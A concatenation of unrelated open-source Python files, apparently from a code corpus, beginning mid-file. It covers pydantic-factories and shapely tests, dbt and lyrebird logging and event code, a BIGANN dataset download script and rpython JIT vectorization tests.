from pyspark.sql import functions as F
temp_dfs.append(df.withColumn(col_temp_name, F.monotonically_increasing_id()))
def _append(df1, df2):
return df1.join(df2, col_temp_name, "outer")
df_result = reduce(_append, temp_dfs).drop(col_temp_name)
elif like == "rows":
from pyspark.sql import DataFrame
df_result = reduce(DataFrame.union, dfs)
else:
RaiseIt.value_error(like, ["columns", "rows"])
    return df_result
|
tests/constraints/test_int_constraints.py | lyz-code/pydantic-factories | 163 | 11155437 | from typing import Optional
import pytest
from hypothesis import given
from hypothesis.strategies import integers
from pydantic import ConstrainedInt
from pydantic_factories.constraints.constrained_integer_handler import (
handle_constrained_int,
)
from pydantic_factories.utils import passes_pydantic_multiple_validator
def create_constrained_field(
gt: Optional[int] = None,
ge: Optional[int] = None,
lt: Optional[int] = None,
le: Optional[int] = None,
multiple_of: Optional[int] = None,
) -> ConstrainedInt:
field = ConstrainedInt()
field.ge = ge
field.gt = gt
field.lt = lt
field.le = le
field.multiple_of = multiple_of
return field
def test_handle_constrained_int_without_constraints():
result = handle_constrained_int(create_constrained_field())
assert isinstance(result, int)
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_ge(minimum):
result = handle_constrained_int(create_constrained_field(ge=minimum))
assert result >= minimum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_gt(minimum):
result = handle_constrained_int(create_constrained_field(gt=minimum))
assert result > minimum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_le(maximum):
result = handle_constrained_int(create_constrained_field(le=maximum))
assert result <= maximum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_lt(maximum):
result = handle_constrained_int(create_constrained_field(lt=maximum))
assert result < maximum
@given(integers(min_value=-1000000000, max_value=1000000000))
def test_handle_constrained_int_handles_multiple_of(multiple_of):
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of))
assert passes_pydantic_multiple_validator(result, multiple_of)
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_lt(val1, val2):
multiple_of, max_value = sorted([val1, val2])
if multiple_of < max_value - 1 or multiple_of == 0:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, lt=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, lt=max_value))
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_le(val1, val2):
multiple_of, max_value = sorted([val1, val2])
if multiple_of < max_value or multiple_of == 0:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, le=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, le=max_value))
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_ge(val1, val2):
min_value, multiple_of = sorted([val1, val2])
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_gt(val1, val2):
min_value, multiple_of = sorted([val1, val2])
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, gt=min_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_multiple_of_with_ge_and_le(val1, val2, val3):
min_value, multiple_of, max_value = sorted([val1, val2, val3])
if multiple_of < max_value and min_value < max_value or multiple_of == 0:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
@given(
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
integers(min_value=-1000000000, max_value=1000000000),
)
def test_handle_constrained_int_handles_ge_and_le_with_lower_multiple_of(val1, val2, val3):
multiple_of, min_value, max_value = sorted([val1, val2, val3])
if multiple_of == 0 or multiple_of < max_value and min_value < max_value:
result = handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
assert passes_pydantic_multiple_validator(result, multiple_of)
else:
with pytest.raises(AssertionError):
handle_constrained_int(create_constrained_field(multiple_of=multiple_of, ge=min_value, le=max_value))
|
lyrebird/checker/event.py | DuXiao1997/lyrebird | 737 | 11155469 | from lyrebird import application
from .. import checker
class CheckerEventHandler:
def __call__(self, channel, *args, **kw):
def func(origin_func):
if not checker.scripts_tmp_storage.get(checker.TYPE_EVENT):
checker.scripts_tmp_storage[checker.TYPE_EVENT] = []
checker.scripts_tmp_storage[checker.TYPE_EVENT].append({
'name': origin_func.__name__,
'func': origin_func,
'channel': channel
})
return origin_func
return func
def issue(self, title, message):
notice = {
"title": title,
"message": message
}
application.server['event'].publish('notice', notice)
def publish(self, channel, message, *args, **kwargs):
application.server['event'].publish(channel, message, *args, **kwargs)
@staticmethod
def register(func_info):
application.server['event'].subscribe(func_info['channel'], func_info['func'])
@staticmethod
def unregister(func_info):
application.server['event'].unsubscribe(func_info['channel'], func_info['func'])
event = CheckerEventHandler()
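# Usage sketch (an added illustration; 'flow' is an example channel name, not
# something this file defines). A checker script decorates a handler, which
# register() later subscribes to that channel:
#
#     @event('flow')
#     def on_flow(msg):
#         event.issue('Checker notice', str(msg))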
|
fairlearn/datasets/_constants.py | alliesaizan/fairlearn | 1,142 | 11155483 | # Copyright (c) Microsoft Corporation and Fairlearn contributors.
# Licensed under the MIT License.
_DOWNLOAD_DIRECTORY_NAME = ".fairlearn-data"
|
core/dbt/events/adapter_endpoint.py | f1fe/dbt | 3,156 | 11155500 | from dataclasses import dataclass
from dbt.events.functions import fire_event
from dbt.events.types import (
AdapterEventDebug, AdapterEventInfo, AdapterEventWarning, AdapterEventError
)
@dataclass
class AdapterLogger():
name: str
def debug(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventDebug(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def info(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventInfo(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def warning(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventWarning(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def error(self, msg, *args, exc_info=None, extra=None, stack_info=False):
event = AdapterEventError(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
# The default exc_info=True is what makes this method different
def exception(self, msg, *args, exc_info=True, extra=None, stack_info=False):
event = AdapterEventError(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
def critical(self, msg, *args, exc_info=False, extra=None, stack_info=False):
event = AdapterEventError(name=self.name, base_msg=msg, args=args)
event.exc_info = exc_info
event.extra = extra
event.stack_info = stack_info
fire_event(event)
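# Usage sketch (an added illustration, assuming stdlib-logging-style "%" args since
# base_msg and args are forwarded to the event classes above):
#
#     logger = AdapterLogger("MyAdapter")
#     logger.debug("opening connection to %s", "analytics")
#     logger.exception("query failed")   # exc_info defaults to True here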
|
download_bigann.py | DmitryKey/hnswlib | 1,765 | 11155508 | import os.path
import os
links = ['ftp://ftp.irisa.fr/local/texmex/corpus/bigann_query.bvecs.gz',
'ftp://ftp.irisa.fr/local/texmex/corpus/bigann_gnd.tar.gz',
'ftp://ftp.irisa.fr/local/texmex/corpus/bigann_base.bvecs.gz']
os.makedirs('downloads', exist_ok=True)
os.makedirs('bigann', exist_ok=True)
for link in links:
name = link.rsplit('/', 1)[-1]
filename = os.path.join('downloads', name)
if not os.path.isfile(filename):
print('Downloading: ' + filename)
try:
os.system('wget --output-document=' + filename + ' ' + link)
except Exception as inst:
print(inst)
print(' Encountered unknown error. Continuing.')
else:
print('Already downloaded: ' + filename)
if filename.endswith('.tar.gz'):
command = 'tar -zxf ' + filename + ' --directory bigann'
else:
command = 'cat ' + filename + ' | gzip -dc > bigann/' + name.replace(".gz", "")
print("Unpacking file:", command)
os.system(command)
|
tests/test_blocking.py | ShadowJonathan/txredisapi | 104 | 11155511 | # coding: utf-8
# Copyright 2009 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from twisted.trial import unittest
import txredisapi as redis
from tests.mixins import REDIS_HOST, REDIS_PORT
class TestBlockingCommands(unittest.TestCase):
QUEUE_KEY = 'txredisapi:test_queue'
TEST_KEY = 'txredisapi:test_key'
QUEUE_VALUE = 'queue_value'
@defer.inlineCallbacks
def testBlocking(self):
db = yield redis.ConnectionPool(REDIS_HOST, REDIS_PORT, poolsize=2,
reconnect=False)
yield db.delete(self.QUEUE_KEY, self.TEST_KEY)
# Block first connection.
d = db.brpop(self.QUEUE_KEY, timeout=3)
# Use second connection.
yield db.set(self.TEST_KEY, 'somevalue')
# Should use second connection again. Will block till end of
# brpop otherwise.
yield db.lpush('txredisapi:test_queue', self.QUEUE_VALUE)
brpop_result = yield d
self.assertNotEqual(brpop_result, None)
yield db.delete(self.QUEUE_KEY, self.TEST_KEY)
yield db.disconnect()
|
pylearn2/utils/tests/test_compile.py | ikervazquezlopez/Pylearn2 | 2,045 | 11155567 | """Tests for compilation utilities."""
import theano
import pickle
from pylearn2.utils.compile import (
compiled_theano_function, HasCompiledFunctions
)
class Dummy(HasCompiledFunctions):
const = 3.14159
@compiled_theano_function
def func(self):
val = theano.tensor.as_tensor_variable(self.const)
return theano.function([], val)
def test_simple_compilation():
x = Dummy()
f = x.func
g = x.func
assert f is g
assert abs(x.func() - Dummy.const) < 1e-6
def test_pickling():
a = Dummy()
assert abs(a.func() - Dummy.const) < 1e-6
serialized = pickle.dumps(a)
b = pickle.loads(serialized)
assert not hasattr(b, '_compiled_functions')
assert abs(b.func() - Dummy.const) < 1e-6
assert not (a.func is b.func)
|
tests/test_getitem.py | Jeremiah-England/Shapely | 2,382 | 11155575 | from . import unittest, shapely20_deprecated
from shapely import geometry
class CoordsGetItemTestCase(unittest.TestCase):
def test_index_2d_coords(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.LineString(c)
for i in range(-4, 4):
self.assertTrue(g.coords[i] == c[i])
self.assertRaises(IndexError, lambda: g.coords[4])
self.assertRaises(IndexError, lambda: g.coords[-5])
def test_index_3d_coords(self):
c = [(float(x), float(-x), float(x*2)) for x in range(4)]
g = geometry.LineString(c)
for i in range(-4, 4):
self.assertTrue(g.coords[i] == c[i])
self.assertRaises(IndexError, lambda: g.coords[4])
self.assertRaises(IndexError, lambda: g.coords[-5])
def test_index_coords_misc(self):
g = geometry.LineString() # empty
self.assertRaises(IndexError, lambda: g.coords[0])
self.assertRaises(TypeError, lambda: g.coords[0.0])
def test_slice_2d_coords(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.LineString(c)
self.assertTrue(g.coords[1:] == c[1:])
self.assertTrue(g.coords[:-1] == c[:-1])
self.assertTrue(g.coords[::-1] == c[::-1])
self.assertTrue(g.coords[::2] == c[::2])
self.assertTrue(g.coords[:4] == c[:4])
self.assertTrue(g.coords[4:] == c[4:] == [])
def test_slice_3d_coords(self):
c = [(float(x), float(-x), float(x*2)) for x in range(4)]
g = geometry.LineString(c)
self.assertTrue(g.coords[1:] == c[1:])
self.assertTrue(g.coords[:-1] == c[:-1])
self.assertTrue(g.coords[::-1] == c[::-1])
self.assertTrue(g.coords[::2] == c[::2])
self.assertTrue(g.coords[:4] == c[:4])
self.assertTrue(g.coords[4:] == c[4:] == [])
class MultiGeomGetItemTestCase(unittest.TestCase):
@shapely20_deprecated
def test_index_multigeom(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.MultiPoint(c)
for i in range(-4, 4):
self.assertTrue(g[i].equals(geometry.Point(c[i])))
self.assertRaises(IndexError, lambda: g[4])
self.assertRaises(IndexError, lambda: g[-5])
@shapely20_deprecated
def test_index_multigeom_misc(self):
g = geometry.MultiLineString() # empty
self.assertRaises(IndexError, lambda: g[0])
self.assertRaises(TypeError, lambda: g[0.0])
@shapely20_deprecated
def test_slice_multigeom(self):
c = [(float(x), float(-x)) for x in range(4)]
g = geometry.MultiPoint(c)
self.assertEqual(type(g[:]), type(g))
self.assertEqual(len(g[:]), len(g))
self.assertTrue(g[1:].equals(geometry.MultiPoint(c[1:])))
self.assertTrue(g[:-1].equals(geometry.MultiPoint(c[:-1])))
self.assertTrue(g[::-1].equals(geometry.MultiPoint(c[::-1])))
self.assertTrue(g[4:].is_empty)
class LinearRingGetItemTestCase(unittest.TestCase):
def test_index_linearring(self):
shell = geometry.polygon.LinearRing([(0.0, 0.0), (70.0, 120.0),
(140.0, 0.0), (0.0, 0.0)])
holes = [geometry.polygon.LinearRing([(60.0, 80.0), (80.0, 80.0),
(70.0, 60.0), (60.0, 80.0)]),
geometry.polygon.LinearRing([(30.0, 10.0), (50.0, 10.0),
(40.0, 30.0), (30.0, 10.0)]),
geometry.polygon.LinearRing([(90.0, 10), (110.0, 10.0),
(100.0, 30.0), (90.0, 10.0)])]
g = geometry.Polygon(shell, holes)
for i in range(-3, 3):
self.assertTrue(g.interiors[i].equals(holes[i]))
self.assertRaises(IndexError, lambda: g.interiors[3])
self.assertRaises(IndexError, lambda: g.interiors[-4])
def test_index_linearring_misc(self):
g = geometry.Polygon() # empty
self.assertRaises(IndexError, lambda: g.interiors[0])
self.assertRaises(TypeError, lambda: g.interiors[0.0])
def test_slice_linearring(self):
shell = geometry.polygon.LinearRing([(0.0, 0.0), (70.0, 120.0),
(140.0, 0.0), (0.0, 0.0)])
holes = [geometry.polygon.LinearRing([(60.0, 80.0), (80.0, 80.0),
(70.0, 60.0), (60.0, 80.0)]),
geometry.polygon.LinearRing([(30.0, 10.0), (50.0, 10.0),
(40.0, 30.0), (30.0, 10.0)]),
geometry.polygon.LinearRing([(90.0, 10), (110.0, 10.0),
(100.0, 30.0), (90.0, 10.0)])]
g = geometry.Polygon(shell, holes)
t = [a.equals(b) for (a, b) in zip(g.interiors[1:], holes[1:])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[:-1], holes[:-1])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[::-1], holes[::-1])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[::2], holes[::2])]
self.assertTrue(all(t))
t = [a.equals(b) for (a, b) in zip(g.interiors[:3], holes[:3])]
self.assertTrue(all(t))
self.assertTrue(g.interiors[3:] == holes[3:] == [])
|
tests/stress/recursive_gen.py | sebastien-riou/micropython | 13,648 | 11155583 | # test deeply recursive generators
# simple "yield from" recursion
def gen():
yield from gen()
try:
list(gen())
except RuntimeError:
print("RuntimeError")
# recursion via an iterator over a generator
def gen2():
for x in gen2():
yield x
try:
next(gen2())
except RuntimeError:
print("RuntimeError")
|
rpython/jit/metainterp/test/test_zvector.py | m4sterchain/mesapy | 381 | 11155588 | import py
import sys
import pytest
import math
import functools
from hypothesis import given, note, strategies as st, settings
from rpython.jit.metainterp.warmspot import ll_meta_interp, get_stats
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.jit.codewriter.policy import StopAtXPolicy
from rpython.jit.metainterp.resoperation import rop
from rpython.jit.metainterp import history
from rpython.rlib.jit import JitDriver, hint, set_param
from rpython.rlib.objectmodel import compute_hash
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rlib.rarithmetic import r_uint, intmask, r_int
from rpython.rlib.rawstorage import (alloc_raw_storage, raw_storage_setitem,
free_raw_storage, raw_storage_getitem)
from rpython.rlib.objectmodel import (specialize, is_annotation_constant,
always_inline)
from rpython.jit.backend.detect_cpu import getcpuclass
from rpython.jit.tool.oparser import parse
from rpython.jit.metainterp.history import (AbstractFailDescr,
AbstractDescr,
BasicFailDescr, BasicFinalDescr,
JitCellToken, TargetToken,
ConstInt, ConstPtr,
Const, ConstFloat)
CPU = getcpuclass()
if sys.maxint == 2**31-1:
pytest.skip("32bit platforms are not supported")
@specialize.argtype(0,1)
def malloc(T,n):
return lltype.malloc(T, n, flavor='raw', zero=True)
def free(mem):
lltype.free(mem, flavor='raw')
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
    # Close in the usual relative/absolute sense, or both NaN, or two infinities
    # of the same sign.
    return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol) \
        or (math.isnan(a) and math.isnan(b)) \
        or (math.isinf(a) and math.isinf(b) and
            ((a < 0.0 and b < 0.0) or (a > 0.0 and b > 0.0)))
class RawStorage(object):
def __init__(self):
self.arrays = []
def new(self, values, type, size=None, zero=True):
bytecount = rffi.sizeof(type)
if not values:
array = alloc_raw_storage(size*bytecount, zero=zero)
self.arrays.append(array)
return array
else:
size = len(values)*bytecount
array = alloc_raw_storage(size, zero=zero)
for i,v in enumerate(values):
raw_storage_setitem(array, i*bytecount, rffi.cast(type,v))
self.arrays.append(array)
return array
def clear(self):
while self.arrays:
array = self.arrays.pop()
free_raw_storage(array)
@pytest.fixture(scope='function')
def rawstorage(request):
rs = RawStorage()
request.addfinalizer(rs.clear)
request.cls.a
return rs
class VectorizeTests(object):
enable_opts = 'intbounds:rewrite:virtualize:string:earlyforce:pure:heap:unroll'
def setup_method(self, method):
if not self.supports_vector_ext():
py.test.skip("this cpu %s has no implemented vector backend" % CPU)
def meta_interp(self, f, args, policy=None, vec=True, vec_all=False):
return ll_meta_interp(f, args, enable_opts=self.enable_opts,
policy=policy,
CPUClass=self.CPUClass,
type_system=self.type_system,
vec=vec, vec_all=vec_all)
# FLOAT UNARY
def _vector_float_unary(self, func, type, data):
func = always_inline(func)
size = rffi.sizeof(type)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vc):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(type,va,i)
c = func(a)
raw_storage_setitem(vc, i, rffi.cast(type,c))
i += size
la = data.draw(st.lists(st.floats(), min_size=10, max_size=150))
l = len(la)
rawstorage = RawStorage()
va = rawstorage.new(la, type)
vc = rawstorage.new(None, type, size=l)
self.meta_interp(f, [l*size, va, vc], vec=True)
for i in range(l):
c = raw_storage_getitem(type,vc,i*size)
r = func(la[i])
assert isclose(r, c)
rawstorage.clear()
def vec_int_unary(test_func, unary_func, type):
return pytest.mark.parametrize('func,type', [
(unary_func, type)
])(given(data=st.data())(test_func))
vec_float_unary = functools.partial(vec_int_unary, _vector_float_unary)
test_vec_float_abs = \
vec_float_unary(lambda v: abs(v), rffi.DOUBLE)
test_vec_float_neg = \
vec_float_unary(lambda v: -v, rffi.DOUBLE)
# FLOAT BINARY
def _vector_simple_float(self, func, type, data):
func = always_inline(func)
size = rffi.sizeof(rffi.DOUBLE)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(type,va,i)
b = raw_storage_getitem(type,vb,i)
c = func(a,b)
raw_storage_setitem(vc, i, rffi.cast(type,c))
i += size
la = data.draw(st.lists(st.floats(), min_size=10, max_size=150))
l = len(la)
lb = data.draw(st.lists(st.floats(), min_size=l, max_size=l))
rawstorage = RawStorage()
va = rawstorage.new(la, type)
vb = rawstorage.new(lb, type)
vc = rawstorage.new(None, type, size=l)
self.meta_interp(f, [l*size, va, vb, vc], vec=True)
for i in range(l):
c = raw_storage_getitem(type,vc,i*size)
r = rffi.cast(type, func(la[i], lb[i]))
assert isclose(r, c)
rawstorage.clear()
def _vec_float_binary(test_func, func, type):
return pytest.mark.parametrize('func,type', [
(func, type)
])(given(data=st.data())(test_func))
vec_float_binary = functools.partial(_vec_float_binary, _vector_simple_float)
test_vec_float_add = \
vec_float_binary(lambda a,b: a+b, rffi.DOUBLE)
test_vec_float_sub = \
vec_float_binary(lambda a,b: a-b, rffi.DOUBLE)
test_vec_float_mul = \
vec_float_binary(lambda a,b: a*b, rffi.DOUBLE)
test_vec_float_cmp_eq = \
vec_float_binary(lambda a,b: a == b, rffi.DOUBLE)
test_vec_float_cmp_ne = \
vec_float_binary(lambda a,b: a != b, rffi.DOUBLE)
def _vector_simple_int(self, func, type, la):
oldfunc = func
func = always_inline(func)
size = rffi.sizeof(type)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(bytecount, va, vb, vc):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
a = raw_storage_getitem(type,va,i)
b = raw_storage_getitem(type,vb,i)
c = func(a,b)
raw_storage_setitem(vc, i, rffi.cast(type,c))
i += size
l = len(la)
lb = list(reversed(la))[:]
rawstorage = RawStorage()
va = rawstorage.new(la, type)
vb = rawstorage.new(lb, type)
vc = rawstorage.new(None, type, size=l)
self.meta_interp(f, [l*size, va, vb, vc], vec=True)
for i in range(l):
c = raw_storage_getitem(type,vc,i*size)
assert rffi.cast(type, oldfunc(la[i], lb[i])) == c
rawstorage.clear()
def vec_int_arith(test_func, arith_func, type):
size = rffi.sizeof(type)
bits = size*8
assert 0 <= bits <= 64
integers = st.integers(min_value=-2**(bits-1), max_value=2**(bits-1)-1)
@given(st.lists(integers, min_size=10, max_size=15))
@settings(max_examples=20)
def tf(self, la):
return test_func(self, arith_func, type, la)
return tf
vec_int_arith = functools.partial(vec_int_arith, _vector_simple_int)
test_vec_simple_int_signed_add = \
vec_int_arith(lambda a,b: intmask(a+b), rffi.SIGNED)
test_vec_simple_int_int_add = \
vec_int_arith(lambda a,b: intmask(r_int(a)+r_int(b)), rffi.INT)
test_vec_simple_int_short_add = \
vec_int_arith(lambda a,b: intmask(r_int(a)+r_int(b)), rffi.SHORT)
test_vec_simple_int_signed_sub = \
vec_int_arith(lambda a,b: intmask(a-b), rffi.SIGNED)
test_vec_simple_int_sub_int = \
vec_int_arith(lambda a,b: intmask(r_int(a)-r_int(b)), rffi.INT)
test_vec_simple_int_sub_short = \
vec_int_arith(lambda a,b: intmask(r_int(a)-r_int(b)), rffi.SHORT)
test_vec_simple_int_signed_and = \
vec_int_arith(lambda a,b: intmask(a)&intmask(b), rffi.SIGNED)
test_vec_simple_int_int_and = \
vec_int_arith(lambda a,b: intmask(a)&intmask(b), rffi.INT)
test_vec_simple_int_short_and = \
vec_int_arith(lambda a,b: intmask(a)&intmask(b), rffi.SHORT)
test_vec_simple_int_or_signed = \
vec_int_arith(lambda a,b: intmask(a)|intmask(b), rffi.SIGNED)
test_vec_simple_int_or_int = \
vec_int_arith(lambda a,b: intmask(a)|intmask(b), rffi.INT)
test_vec_simple_int_or_short = \
vec_int_arith(lambda a,b: intmask(a)|intmask(b), rffi.SHORT)
test_vec_simple_int_xor_signed = \
vec_int_arith(lambda a,b: intmask(a)^intmask(b), rffi.SIGNED)
test_vec_simple_int_xor_int = \
vec_int_arith(lambda a,b: intmask(a)^intmask(b), rffi.INT)
test_vec_simple_int_xor_short = \
vec_int_arith(lambda a,b: intmask(a)^intmask(b), rffi.SHORT)
test_vec_simple_int_int_cmp_eq = \
vec_int_arith(lambda a,b: a == b, rffi.SIGNED)
test_vec_simple_int_int_cmp_ne = \
        vec_int_arith(lambda a,b: a != b, rffi.SIGNED)
@py.test.mark.parametrize('i',[1,2,3,4,9])
def test_vec_register_too_small_vector(self, i):
myjitdriver = JitDriver(greens = [],
reds = 'auto',
vectorize=True)
T = lltype.Array(rffi.SHORT, hints={'nolength': True})
def g(d, va, vb):
i = 0
while i < d:
myjitdriver.jit_merge_point()
a = va[i]
b = vb[i]
ec = intmask(intmask(a) + intmask(b))
va[i] = rffi.r_short(ec)
i += 1
def f(d):
i = 0
va = lltype.malloc(T, d+100, flavor='raw', zero=True)
vb = lltype.malloc(T, d+100, flavor='raw', zero=True)
for j in range(d+100):
va[j] = rffi.r_short(1)
vb[j] = rffi.r_short(2)
g(d+100, va, vb)
g(d, va, vb) # this iteration might not fit into the vector register
res = intmask(va[d])
lltype.free(va, flavor='raw')
lltype.free(vb, flavor='raw')
return res
res = self.meta_interp(f, [i], vec=True)
assert res == f(i) == 3
def test_vec_max(self):
myjitdriver = JitDriver(greens = [],
reds = 'auto',
vectorize=True)
def fmax(v1, v2):
return v1 if v1 >= v2 or math.isnan(v2) else v2
T = lltype.Array(rffi.DOUBLE, hints={'nolength': True})
def f(d):
i = 0
va = lltype.malloc(T, d, flavor='raw', zero=True)
for j in range(d):
va[j] = float(j)
va[13] = 128.0
m = -128.0
while i < d:
myjitdriver.jit_merge_point()
a = va[i]
m = fmax(a, m)
i += 1
lltype.free(va, flavor='raw')
return m
res = self.meta_interp(f, [30], vec=True)
assert res == f(30) == 128
@py.test.mark.parametrize('type,func,init,insert,at,count,breaks',
# all
[(rffi.DOUBLE, lambda x: not bool(x), 1.0, None, -1,32, False),
(rffi.DOUBLE, lambda x: x == 0.0, 1.0, None, -1,33, False),
(rffi.DOUBLE, lambda x: x == 0.0, 1.0, 0.0, 33,34, True),
(rffi.DOUBLE, lambda x: x == 0.0, 1.0, 0.1, 4,34, False),
(lltype.Signed, lambda x: not bool(x), 1, None, -1,32, False),
(lltype.Signed, lambda x: not bool(x), 1, 0, 14,32, True),
(lltype.Signed, lambda x: not bool(x), 1, 0, 15,31, True),
(lltype.Signed, lambda x: not bool(x), 1, 0, 4,30, True),
(lltype.Signed, lambda x: x == 0, 1, None, -1,33, False),
(lltype.Signed, lambda x: x == 0, 1, 0, 33,34, True),
# any
(rffi.DOUBLE, lambda x: x != 0.0, 0.0, 1.0, 33,35, True),
(rffi.DOUBLE, lambda x: x != 0.0, 0.0, 1.0, -1,36, False),
(rffi.DOUBLE, lambda x: bool(x), 0.0, 1.0, 33,37, True),
(rffi.DOUBLE, lambda x: bool(x), 0.0, 1.0, -1,38, False),
(lltype.Signed, lambda x: x != 0, 0, 1, 33,35, True),
(lltype.Signed, lambda x: x != 0, 0, 1, -1,36, False),
(lltype.Signed, lambda x: bool(x), 0, 1, 33,37, True),
(lltype.Signed, lambda x: bool(x), 0, 1, -1,38, False),
(rffi.INT, lambda x: intmask(x) != 0, rffi.r_int(0), rffi.r_int(1), 33,35, True),
(rffi.INT, lambda x: intmask(x) != 0, rffi.r_int(0), rffi.r_int(1), -1,36, False),
(rffi.INT, lambda x: bool(intmask(x)), rffi.r_int(0), rffi.r_int(1), 33,37, True),
(rffi.INT, lambda x: bool(intmask(x)), rffi.r_int(0), rffi.r_int(1), -1,38, False),
])
def test_bool_reduction(self, type, func, init, insert, at, count, breaks):
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
T = lltype.Array(type, hints={'nolength': True})
def f(d):
va = lltype.malloc(T, d, flavor='raw', zero=True)
for i in range(d): va[i] = init
if at != -1:
va[at] = insert
i = 0 ; nobreak = False
while i < d:
myjitdriver.jit_merge_point()
b = func(va[i])
if b:
assert b
break
i += 1
else:
nobreak = True
lltype.free(va, flavor='raw')
return not nobreak
res = self.meta_interp(f, [count], vec=True)
assert res == f(count) == breaks
def _vec_reduce(self, strat, func, type, data):
func = always_inline(func)
size = rffi.sizeof(type)
myjitdriver = JitDriver(greens = [], reds = 'auto', vectorize=True)
def f(accum, bytecount, v):
i = 0
while i < bytecount:
myjitdriver.jit_merge_point()
e = raw_storage_getitem(type,v,i)
accum = func(accum,e)
i += size
return accum
la = data.draw(st.lists(strat, min_size=10, max_size=150))
#la = [1.0] * 10
l = len(la)
accum = data.draw(strat)
rawstorage = RawStorage()
va = rawstorage.new(la, type)
res = self.meta_interp(f, [accum, l*size, va], vec=True)
assert isclose(rffi.cast(type, res), f(accum, l*size, va))
rawstorage.clear()
def vec_reduce(test_func, strat, arith_func, type):
return pytest.mark.parametrize('strat,func,type', [
(strat, arith_func, type)
])(given(data=st.data())(test_func))
vec_reduce = functools.partial(vec_reduce, _vec_reduce)
test_vec_int_sum = vec_reduce(st.integers(min_value=-2**(64-1), max_value=2**(64-1)-1),
lambda a,b: lltype.intmask(lltype.intmask(a)+lltype.intmask(b)), lltype.Signed)
small_floats = st.floats(min_value=-100, max_value=100, allow_nan=False, allow_infinity=False)
test_vec_float_sum = vec_reduce(small_floats, lambda a,b: a+b, rffi.DOUBLE)
    # Precision loss: the reduction accumulates values (so the associative and commutative
    # properties must hold), and you can end up with a tiny number and a huge number that
    # are finally multiplied together, losing precision.
# test_vec_float_prod = vec_reduce(small_floats, lambda a,b: a*b, rffi.DOUBLE)
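    # Worked example of the effect (illustrative numbers only, not tied to the tests above):
    # with 64-bit floats, (1e16 + 1.0) + 1.0 == 1e16 while 1e16 + (1.0 + 1.0) == 1.0000000000000002e16,
    # so regrouping the accumulation (which vectorization does) can change the result.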
def test_constant_expand(self):
